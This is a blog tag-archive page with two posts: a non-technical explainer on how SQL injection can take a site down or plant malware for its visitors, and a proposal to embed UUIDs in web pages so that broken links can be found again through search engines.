Tag Archives: google

SQL-Injections, the two most common types

Opening a site Google has listed as spreading malicious software via the browser. In this case the site was the victim of SQL-injections.
Opening a site Google has listed as spreading malicious software via the browser. In this case the site was the victim of SQL-injections.

What are SQL-injections? How can they affect my site? How does it happen and how can I avoid it?

Your site may already be under attack, but the attacker is only using your site to attack your users! This is done using something called SQL-injections.

Since Firefox (2 and 3) and MSIE 7 started using Google’s (and others) system for blocking sites that produce harmful web pages the problem with SQL-injections have been put on the spot.

What happens is that an attacker hacks a site by placing their own SQL-code into the database of the victim system. A system open to SQL-injections may be attacked in basically two ways. Either the attacker performs a DOS (denial of service) attack. This could be done by deleting all the tables or doing something else harmful to the site, effectively bringing the whole site down.

The other form of attack that can be performed on systems open to SQL-injections is far more sneaky and may not be detected at all by the site owner or the site visitors. This form of attack consists of planting client side browser code in the database making all visitors run client side code that will infect their computer with malware or viruses. This malicious software may do everything from listening in on traffic between the client (web browser) and bank sites, to connecting the client system to a botnet.

Needless to say, attacks using SQL-injections has become a problem not so much for the owner of the originally defunct site as for the visitors to said site. Although users of the web should not underestimate the consequence of a good virus protection, system update policy and secure browsing policy.

Since the owner of the vulnerable site won’t notice any detour from business as usual and neither will most infected clients, nobody is the wiser to the problem.

This is why Google (and others) have started evaluating (and flagging) sites with bad content, and why Firefox and MSIE (and probably others) have started blocking them.

Continue reading SQL-Injections, the two most common types

Using UUIDs to Prevent Broken Links

I don’t know if someone has proposed this before, but how about using UUIDs to prevent broken links?

A UUID, Universally Unique Identifier, is a hexadecimal number divided into five sections. A UUID has the special quality that it is universally unique. This means two people on each side of the world could create a UUID each at the exact same time, and still be sure their UUIDs are not identical. In fact they can create a large number of UUIDs and still be sure they are not identical. (The same goes for two people on the same server.)

This quality makes UUIDs a perfect tool for assigning unique IDs to web pages or other Internet resources (in fact any resource of any kind, your dog, the cuttlery in your drawers, you name it.)

This could be done like this:

Step 1: Place the UUID on the page

First a UUID has to be put on the webpage, perhaps with a meta-tag, or with plain text on the page.

With a meta tag it could be done like:

<meta name=”UUID” content=”8523813a-7c47-4cd9-ad78-09c14dfb505f”/>

Or on the page, like:

UUID: 8523813a-7c47-4cd9-ad78-09c14dfb505f

Step 2: Find the UUID

The second step would be to make sure every time a program stores a URL to the page it also stores the UUID. (When creating bookmarks, or linking from one site to another etc).

So, once the page get lost, either because the link has changed, the page has been moved or something similar, the browser (or site) can use the UUID to find the page again.

The second step obviously demands a search engine (or some other central registry) that utilizes UUIDs in it’s index since the system does require some kind of central processing for keeping track of a UUID-to-page-link.

A UUID is not a particularly good URI since even UUIDs generated at the same host just a few seconds apart are still totally different from each others (this actually depends on implementation, but one should not assume UUIDs from the same host shares any similarities).

This however is also one of the strengths of UUIDs since it means an Internet resource should be possible to locate regardless of its physical location (in a contrary to ordinary http-URLs that are tightly bound to their location — they start with the server name).

Since a UUID (per definition) is universally unique, it is fairly simple to generate one wherever you are, and use it in a page, be sure there are no duplicates and locate the exact page of the UUID again.

A Google experiment

I’ve placed the text “UUID: 8523813a-7c47-4cd9-ad78-09c14dfb505f” on this page. (Several times now). As far as I’ve been able to discern, Google indexes even such arbitrary information as UUID data (the exact string “8523813a-7c47-4cd9-ad78-09c14dfb505f” to be precise, check out this page with a discussion on how to use UUIDs to make pages unique… It has nothing to do with this discussion but is an interesting example on how UUIDs could be used with Google).

By searching for “8523813a-7c47-4cd9-ad78-09c14dfb505f” it should be possible to locate this page… (see if it works? — Give Google time to index the page though… Update: the above link seems to not work, but this one [searching for the UUID with “-” replaced to space — or “+”], however, does…)

Finally

The page localization should work regardless of the page’s position, site, or anything. In fact, as long as the UUID is still there, it should even be possible to place this text in a document of type Word/OpenDocument/PDF or any other format a search engine can index, and the text would still be possible to find with nothing but the UUID.

Obviously the end result of this technology would be that there is no “search-engine-in-between” but instead whenever the link is lost, the caller goes to the central repository/search engine (or some other place) and locate the page, then links to it automatically. It should even be smart enough to retry until it finds a link that works if a UUID has several possible links.